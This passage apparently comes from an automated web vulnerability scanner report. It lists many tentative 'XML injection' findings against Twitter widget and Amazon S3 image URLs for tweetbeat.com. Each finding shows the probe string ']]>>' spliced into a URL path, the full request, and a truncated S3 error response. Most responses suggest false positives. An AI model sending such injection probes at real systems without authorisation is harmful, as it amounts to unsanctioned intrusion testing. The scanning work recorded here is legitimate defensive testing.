The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/tweet_button.html]]>>?_=1305489673664&count=horizontal&lang=en&text=The%20Pulse%20of%20Social%20Life%20-%20Live%20tweets&url=http%3A%2F%2Ftweetbeat.com HTTP/1.1
Host: platform0.twitter.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305412459.2

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 294
Date: Sun, 15 May 2011 20:01:37 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets/tweet_button.html]]&gt;&gt;</Key><RequestId>BAF830570318C1DF</Reque
...[SNIP]...

8.5. http://s3.amazonaws.com/tweetbeat_event_pics/large/17612/thunder%20grizz%20g7.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/large/17612/thunder%20grizz%20g7.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics]]>>/large/17612/thunder%20grizz%20g7.jpg?1305322024 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
x-amz-request-id: 4228C9357A558888
x-amz-id-2: JCH0fGtvRla49Kq2VtiRDm6/OyuXc4rmo4QcwSa/0Zm4Vf3eySmGFAeJdEVMtGra
Content-Type: application/xml
Date: Sun, 15 May 2011 20:05:42 GMT
Server: AmazonS3
Content-Length: 308

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>tweetbeat_event_pics]]&gt;&gt;</BucketName><RequestId>4228C9357
...[SNIP]...

8.6. http://s3.amazonaws.com/tweetbeat_event_pics/large/17612/thunder%20grizz%20g7.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/large/17612/thunder%20grizz%20g7.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/large]]>>/17612/thunder%20grizz%20g7.jpg?1305322024 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 1E6F8A0D2280EA32
x-amz-id-2: ujDVZZQnMTWRP7BNI/bbUDkqNVNpaW2+YNM4pcsZtITzJtvDyQFDkyJOhz6CH8g6
Content-Type: application/xml
Date: Sun, 15 May 2011 20:05:45 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>1E6F8A0D2280EA32</RequestId><HostId>ujDVZZQnMTWRP7BNI/bbUDkqNVNpaW2+YNM4pcsZtITzJtvDyQ
...[SNIP]...

8.7. http://s3.amazonaws.com/tweetbeat_event_pics/large/17612/thunder%20grizz%20g7.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/large/17612/thunder%20grizz%20g7.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/large/17612]]>>/thunder%20grizz%20g7.jpg?1305322024 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 4FB0ECE77A79C3E0
x-amz-id-2: Udld5xL7HtBzmXfSC2vPjcVJdfiy+l3wlLyu2WMFwYlf7kAzmR8NmBrLubf3Eu3D
Content-Type: application/xml
Date: Sun, 15 May 2011 20:05:45 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4FB0ECE77A79C3E0</RequestId><HostId>Udld5xL7HtBzmXfSC2vPjcVJdfiy+l3wlLyu2WMFwYlf7kAzmR
...[SNIP]...

8.8. http://s3.amazonaws.com/tweetbeat_event_pics/large/17612/thunder%20grizz%20g7.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/large/17612/thunder%20grizz%20g7.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/large/17612/thunder%20grizz%20g7.jpg]]>>?1305322024 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: DEC0DCC9F260139A
x-amz-id-2: L5DttuYzt11LNyXoiHXnhTpgRKUu+xnuHowJNhZE0iDDrp2t6Xnwl+DVcIC1AOr7
Content-Type: application/xml
Date: Sun, 15 May 2011 20:05:46 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>DEC0DCC9F260139A</RequestId><HostId>L5DttuYzt11LNyXoiHXnhTpgRKUu+xnuHowJNhZE0iDDrp2t6X
...[SNIP]...

8.9. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17566/cannes%20group.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17566/cannes%20group.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics]]>>/thumb_100/17566/cannes%20group.jpg?1305223263 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
x-amz-request-id: BFFFECB988CB253A
x-amz-id-2: WCJCi6X8Jzuv6oGkOnzjeiu0WF+rxwEyVpTvCfHbwsYrkvM+SxutDvtccrEJIjZK
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:14 GMT
Server: AmazonS3
Content-Length: 308

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>tweetbeat_event_pics]]&gt;&gt;</BucketName><RequestId>BFFFECB98
...[SNIP]...

8.10. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17566/cannes%20group.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17566/cannes%20group.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100]]>>/17566/cannes%20group.jpg?1305223263 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 7415FE7BA57796AF
x-amz-id-2: vNdLtsrA6hZ/9fgALoLgejuQHYFSW9DrscHUwO2wPu5BJlANln65K9wsYt9mJARH
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:16 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>7415FE7BA57796AF</RequestId><HostId>vNdLtsrA6hZ/9fgALoLgejuQHYFSW9DrscHUwO2wPu5BJlANln
...[SNIP]...

8.11. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17566/cannes%20group.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17566/cannes%20group.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17566]]>>/cannes%20group.jpg?1305223263 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 2EBAE47D8358A34D
x-amz-id-2: QtxetDMQSEMeysed6Qo4enm1QtvzLwKuC6CAAEKlp/+vds40kzXeThrTSxVU0gZD
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:17 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>2EBAE47D8358A34D</RequestId><HostId>QtxetDMQSEMeysed6Qo4enm1QtvzLwKuC6CAAEKlp/+vds40kz
...[SNIP]...

8.12. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17566/cannes%20group.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17566/cannes%20group.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17566/cannes%20group.jpg]]>>?1305223263 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 2172B9808E49C2D5
x-amz-id-2: NzXJKjpep6Tz288hgIRbDTiiqWo+z4YSCojxFtIndnJ3//C6TnGeZ3arrUO3wmnM
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:18 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>2172B9808E49C2D5</RequestId><HostId>NzXJKjpep6Tz288hgIRbDTiiqWo+z4YSCojxFtIndnJ3//C6Tn
...[SNIP]...

8.13. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17596/Giants%20ross%20back.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17596/Giants%20ross%20back.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics]]>>/thumb_100/17596/Giants%20ross%20back.jpg?1305318515 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
x-amz-request-id: 839012FE87B7D236
x-amz-id-2: CGUkptQjGdWA2Ryw4cyfz8+NL8vNokPoJRWfs+mLVlitf3a0K0nQh4Q+6cGrlFYK
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:16 GMT
Server: AmazonS3
Content-Length: 308

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>tweetbeat_event_pics]]&gt;&gt;</BucketName><RequestId>839012FE8
...[SNIP]...

8.14. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17596/Giants%20ross%20back.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17596/Giants%20ross%20back.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100]]>>/17596/Giants%20ross%20back.jpg?1305318515 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 43E6329245F2E4F1
x-amz-id-2: FDIyUm57jXr3TiFQj6FPYk1rFw0La8q9VgmZFD3CN192bRYogHydt1IcDx/Kvgvt
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:18 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>43E6329245F2E4F1</RequestId><HostId>FDIyUm57jXr3TiFQj6FPYk1rFw0La8q9VgmZFD3CN192bRYogH
...[SNIP]...

8.15. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17596/Giants%20ross%20back.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17596/Giants%20ross%20back.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17596]]>>/Giants%20ross%20back.jpg?1305318515 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 6741C186FFF1DE8B
x-amz-id-2: HgnarDDgIGiPNYYc5J4lMjALLXvr+4nNG6aBSiKinU4TZFJ/+okYbUq3D3Cw4yUI
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:20 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>6741C186FFF1DE8B</RequestId><HostId>HgnarDDgIGiPNYYc5J4lMjALLXvr+4nNG6aBSiKinU4TZFJ/+o
...[SNIP]...

8.16. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17596/Giants%20ross%20back.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17596/Giants%20ross%20back.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17596/Giants%20ross%20back.jpg]]>>?1305318515 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 2E86CE60C768A1DB
x-amz-id-2: BnOa7WLJcK7v/5E53tIg+GoqfQ9uW2x84Oj/OYXkhzzW6BycxjzePnN3uNmU03eP
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:21 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>2E86CE60C768A1DB</RequestId><HostId>BnOa7WLJcK7v/5E53tIg+GoqfQ9uW2x84Oj/OYXkhzzW6Bycxj
...[SNIP]...

8.17. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17602/cards%20rasmus.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17602/cards%20rasmus.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics]]>>/thumb_100/17602/cards%20rasmus.jpg?1305319607 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
x-amz-request-id: E8D89C698C9A99C4
x-amz-id-2: 2lNgO+/++WqFDtvlI6SLwMlcnINOf8r0hGSW0KqvCav9jmkl8V1Fz2MepgKMZov2
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:10 GMT
Server: AmazonS3
Content-Length: 308

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>tweetbeat_event_pics]]&gt;&gt;</BucketName><RequestId>E8D89C698
...[SNIP]...

8.18. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17602/cards%20rasmus.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17602/cards%20rasmus.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100]]>>/17602/cards%20rasmus.jpg?1305319607 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 4FC3107BA42A1A08
x-amz-id-2: 2KkCiEtYOXcet4WRR5ljcig4e3srx2SFP8sqS/bqtERE4i2Xpv24H2DQyqBDttDv
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:13 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4FC3107BA42A1A08</RequestId><HostId>2KkCiEtYOXcet4WRR5ljcig4e3srx2SFP8sqS/bqtERE4i2Xpv
...[SNIP]...

8.19. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17602/cards%20rasmus.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17602/cards%20rasmus.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17602]]>>/cards%20rasmus.jpg?1305319607 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: F362C11D96462588
x-amz-id-2: lgHzesIAbGbrJbIpHZoM44KVz3PSwdx8UGLee2QMR82/nVAPUWfETC6rcvuwg/dB
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:14 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F362C11D96462588</RequestId><HostId>lgHzesIAbGbrJbIpHZoM44KVz3PSwdx8UGLee2QMR82/nVAPUW
...[SNIP]...

8.20. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17602/cards%20rasmus.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17602/cards%20rasmus.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17602/cards%20rasmus.jpg]]>>?1305319607 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: F6E689F0DA079AE5
x-amz-id-2: S41gItFsxkwQcfWzXzCLvKI00VuxuFB7E/kXIBCNRswPEQdqdsvNwvJULL7OYGtr
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:14 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F6E689F0DA079AE5</RequestId><HostId>S41gItFsxkwQcfWzXzCLvKI00VuxuFB7E/kXIBCNRswPEQdqds
...[SNIP]...

8.21. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17605/phils%20victorino.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17605/phils%20victorino.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics]]>>/thumb_100/17605/phils%20victorino.jpg?1305320043 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
x-amz-request-id: E7EF3E9980C222AF
x-amz-id-2: BjDw1WTZ9KH6SWCqswHvEiCmplCqtColCpbIsZDiPXGngomJe5pAUZnDBcPucCki
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:01 GMT
Server: AmazonS3
Content-Length: 308

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>tweetbeat_event_pics]]&gt;&gt;</BucketName><RequestId>E7EF3E998
...[SNIP]...

8.22. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17605/phils%20victorino.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17605/phils%20victorino.jpg

Issue detail

